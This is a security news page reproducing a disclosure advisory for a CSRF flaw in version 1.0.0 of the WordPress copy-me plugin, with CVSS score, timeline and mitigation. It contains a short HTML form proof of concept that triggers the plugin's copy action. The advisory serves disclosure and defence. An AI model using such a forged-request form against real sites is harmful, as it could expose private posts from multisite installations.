Friday, December 8, 2023

WordPress Plugin copy-me vulnerable to CSRF

WordPress Plugin copy-me vulnerable to CSRF, which allows unauthenticated attacker to copy posts.

WordPress is web software you can use to create a beautiful website, blog, or app. We like to say that WordPress is both free and priceless at the same time.

Version 4.7 of WordPress, named “Vaughan” in honor of legendary jazz vocalist Sarah “Sassy” Vaughan, is available for download or update in your WordPress dashboard. New features in 4.7 help you get your site set up the way you want it.

Copy-me Plugin

copy-me plugin allows users to copy a post, page or custom post type to another site in a WordPress.

Vulnerability

This plugin does not use nonces. Copying posts could allow taking a secret post from a non-public site within a multisite installation and moving it to a public site.

This attack is classified as OWSAP 10 CSRF(Cross-Site Request Forgery).

Affected Version

Software: copy-me
Version: 1.0.0
Homepage: http://wordpress.org/plugins/copy-me/
Advisory report: dxw security
CVE: Awaiting assignment
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)

Proof of concept

Click submit and it’ll copy post with ID 1 to blog/site with ID 1:
<form method=\”POST\” action=\”http://localhost/wp-admin/admin-ajax.php\”;>
<input type=\”text\” name=\”action\” value=\”copyme_copy_item\”>
<input type=\”text\” name=\”id\” value=\”1\”>
<input type=\”text\” name=\”target\” value=\”1\”>
<input type=\”submit\”>
</form>

Timeline

2016-11-01: Discovered by dewhurstsecurity
2016-12-07: Reported to vendor via contact form: http://www.alancesarini.com/en/contact-2/
2016-12-07: Requested CVE
2016-12-21: Vendor has not responded after 14 days
2016-12-21: Published

Mitigations

Disable the plugin. No fixed version released.

 

Website

Latest articles

Exploitation Methods Used by PlugX Malware Revealed by Splunk Research

PlugX malware is sophisticated in evasion, as it uses the following techniques to avoid...

TA422 Hackers Attack Organizations Using Outlook & WinRAR Vulnerabilities

Hackers exploit Outlook and WinRAR vulnerabilities because these widely used software programs are lucrative...

Bluetooth keystroke-injection Flaw: A Threat to Apple, Linux & Android Devices

An unauthenticated Bluetooth keystroke-injection vulnerability that affects Android, macOS, and iOS devices has been...

Atlassian Patches RCE Flaw that Affected Multiple Products

Atlassian has been discovered with four new vulnerabilities associated with Remote Code Execution in...

Reflectiz Introduces AI-powered Insights on Top of Its Smart Alerting System

Reflectiz, a cybersecurity company specializing in continuous web threat management, proudly introduces a new...

SLAM Attack Gets Root Password Hash in 30 Seconds

Spectre is a class of speculative execution vulnerabilities in microprocessors that can allow threat...

Akira Ransomware Exploiting Zero-day Flaws For Organization Network Access

The Akira ransomware group, which first appeared in March 2023, has been identified as...

Endpoint Strategies for 2024 and beyond

Converge and Defend

What's the pulse of Unified Endpoint Management and Security (UEMS) in Europe? Join us live to uncover the strategies that are defining endpoint security in the region.

Related Articles